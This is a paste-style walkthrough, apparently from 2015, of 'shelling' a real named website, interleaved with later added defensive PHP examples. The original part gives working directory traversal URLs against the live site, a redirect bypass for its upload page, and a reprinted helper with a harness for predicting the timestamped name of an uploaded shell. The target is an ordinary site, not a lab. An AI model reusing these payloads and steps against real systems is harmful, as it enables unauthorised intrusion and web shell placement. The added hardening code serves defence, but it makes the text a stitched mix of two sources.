iAnonGuy

Zen's Shelling Challenge [Solution]

Aug 19th, 2015 (edited)
So, the challenge was to shell the site.

It was vulnerable to Directory Traversal. Some mistook it for LFI and were trying things like PHP wrappers, but the real vulnerability was here:

http://www.vepr.info/zobraz_pohadku.php?pohadka=baron.txt (screenshot: http://prntscr.com/86fm87)
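For contrast, here is the shape of endpoint that produces this class of bug and how it is normally closed. This is an added example, not code from the original paste or from the vepr.info site; STORY_DIR, the function names and the file names are assumptions, and the input used in the demonstration is constructed.

```php
<?php
// Added example, not the site's code: a hypothetical "show a story" endpoint
// in the shape zobraz_pohadku.php appears to have, first as commonly written
// and then hardened. STORY_DIR and all names below are assumptions.

define('STORY_DIR', sys_get_temp_dir() . '/pohadky_example');

// Traversal-prone: the request parameter is glued straight onto the path, so a
// value containing "../" segments walks out of STORY_DIR.
function show_story_unsafe($pohadka)
{
    return @file_get_contents(STORY_DIR . '/' . $pohadka);
}

// Hardened: accept only a bare ".txt" file name, then confirm with realpath()
// that the resolved file really lives inside STORY_DIR.
function show_story_safe($pohadka)
{
    // basename() strips any directory part; the pattern pins the remaining format.
    if ($pohadka !== basename($pohadka) || !preg_match('/^[a-z0-9_-]+\.txt$/i', $pohadka)) {
        return false;
    }
    $dir  = realpath(STORY_DIR);
    $real = realpath(STORY_DIR . '/' . $pohadka);
    if ($dir === false || $real === false) {
        return false;
    }
    // The prefix check includes the separator so a sibling directory that
    // merely shares the prefix (e.g. pohadky_example2) does not pass.
    if (strncmp($real, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return false;
    }
    return file_get_contents($real);
}

// Demonstration on constructed input.
@mkdir(STORY_DIR, 0700, true);
file_put_contents(STORY_DIR . '/baron.txt', "Constructed story text.\n");

echo show_story_safe('baron.txt') !== false ? "baron.txt: served\n" : "baron.txt: refused\n";
echo show_story_safe('../../etc/hostname') === false ? "traversal: refused\n" : "traversal: served\n";
```

The allowlist regex does most of the work; the realpath() prefix check is the backstop for anything the pattern lets through (symlinks inside the directory, for instance), and refusing with `false` instead of echoing a PHP warning keeps file-system layout out of the response.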

After crawling through the site, we found /upload.php. Visiting that page redirects you to http://www.vepr.info/login.php?act=2&reason=99, but that's easily bypassed using NoRedirect.

First, let's read the file:
http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/upload.php (screenshot: http://prntscr.com/86fnk3)

By examining upload.php, we see it pulls in its helper functions through require(). Next, we'll read includes/func.php:

http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/includes/func.php (screenshot: http://prntscr.com/86fpby)

In func.php, there's a function that takes a file name, splits off its extension, and inserts a timestamp between the two. Here's the relevant code:

---
<?php
// Helper recovered from includes/func.php: splits the extension off the
// uploaded file's name and inserts 7 digits of the current Unix time.
function dwn_name($name){
  $oldname = basename($name);
  $i = 0;
  // Walk backwards from the end of the name until the last "." is found.
  while((substr($oldname,-$i-1,1) != ".") && ($i < strlen($oldname)))
    $i++;
  $ext = substr($oldname,-$i,$i);                       // extension without the dot
  $base = substr($oldname,0,strlen($oldname)-$i-1);    // name without the extension
  return $base."_[".substr(time(),1,7)."].".$ext;
}
// Harness: pass the uploaded file's name as the "shell" request parameter.
$x = $_REQUEST['shell'];
echo dwn_name($x);
---
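The weakness in dwn_name() is that the stored name is a pure function of the client-supplied name and the clock, so it can be recomputed by anyone who knows roughly when the upload happened. The following is an added example of how such a helper is usually written on the defending side; it is not code from the original paste or from vepr.info, and the allowlist, function name and sample names are assumptions.

```php
<?php
// Added example, not the site's code: a replacement for a dwn_name()-style
// helper whose output must not be derivable from the upload time. The
// allowlist and every name below are assumptions.

// Extensions the application is willing to store; everything else is refused.
const ALLOWED_EXT = ['txt', 'jpg', 'jpeg', 'png', 'pdf'];

// Return a stored file name that keeps only an allowlisted extension and is
// otherwise unrelated to both the client-supplied name and the clock.
// Returns null when the upload should be rejected.
function safe_upload_name($clientName)
{
    // Same job as the substr() loop in dwn_name(), done with pathinfo():
    // only the final extension is kept, lower-cased for the comparison.
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // 16 bytes from the CSPRNG -> 32 hex characters; nothing about the result
    // is predictable from outside, so the name cannot be reconstructed.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Demonstration on constructed names.
foreach (['report.pdf', 'photo.JPG', 'notes.php', 'archive.tar.gz'] as $n) {
    $stored = safe_upload_name($n);
    echo str_pad($n, 16) . ' -> ' . ($stored ?? 'refused') . "\n";
}
```

Two things the helper deliberately does not do: it never reuses any part of the original base name, and it never "cleans up" a bad extension into an acceptable one. Pair it with storing uploads outside the web root (or with script execution disabled for that directory) so that even a successfully stored file is only ever served as data.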

Save this function for later use. Now, before accessing upload.php, add /login.php to NoRedirect's filter list. (screenshots: http://prntscr.com/86fss8 and http://prntscr.com/86fxmz)

When you receive this message (http://prntscr.com/86fwu3), run the PHP code you saved earlier. It should generate something like this: http://prntscr.com/86fx3t

Ta-da! http://prntscr.com/86fx9k